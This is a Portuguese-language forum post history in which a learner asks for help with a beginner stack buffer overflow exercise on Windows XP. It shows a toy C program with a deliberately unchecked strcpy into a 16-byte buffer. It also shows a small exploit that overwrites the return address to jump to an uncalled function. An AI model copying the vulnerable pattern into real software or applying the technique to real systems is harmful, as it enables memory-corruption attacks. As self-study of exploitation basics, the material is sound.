Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - zero3020

#1
consegui!!!!!!!!

um cara do IRC me ajudou! :P
#2
Eae

To testando aqui o white paper q achei nesse forum sobre stack buffer overflow com WINXP e SP1

Tenho conhecimentos basicos sobre asm e c, e conhecimentos avançados em linguagem de alto nivel pra outros fins.

Gostaria de fazer na pratica esse teste, pq na teoria ja entendi como funciona,  tenho q redirecionar o fluxo do processador pra desviar o programa pra outra função no exemplozinho bem basico.

Olhem o codigo q estou testando:
vuln.c

#include <stdio.h>

void show_pass (){

       char *password[] = {
       "Email: test@testing.com \n",
       "Pass : this_is_a_test"
};

}

main (int argc, char **argv){

 char buffer[16];             // <-- Portal da felicidade
 strcpy (buffer, argv[1]);    // <-- Nosso bombom

}


agora o programa q desvia o fluxo do processador:
exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET "\x90\x12\x40\x00"

main (){

printf ("Sending exploit, please wait...\r\n\r\n");

// A funcao WinExec executa um programa e passa parametros ao mesmo.

WinExec ("\\vuln.exe yesAAAAAAAAAAAAADDDDDDDDBBBB\x90\x12\x40\x00", 0);
exit (0);

}


no caso esse exploit explora o programa de cima, enchendo de porcaria a stack até sobreescrever o endereço de retorno  com o endereço de memória da função q nao é executada q obtive dissassemblando com o gdb.

O que está errado? mesmo o WinXP com SP1 tem alguma segurança contra execução de dados?

mesmo disassemblando o programa vulneravel com o Windows 7 o gdb apresentou o mesmo endereço de memória no tutorial.

Testei o exploit acima não somente como no XP SP1 como no SP2 e outra maquina nao obtive sucesso.

O tutorial do White Shark sobre head spray funcionou certinho no XP com SP2

Gostaria muito q o pessoal aí pudesse me dar uma luz nesse exemplo. Ta phoda!

Falow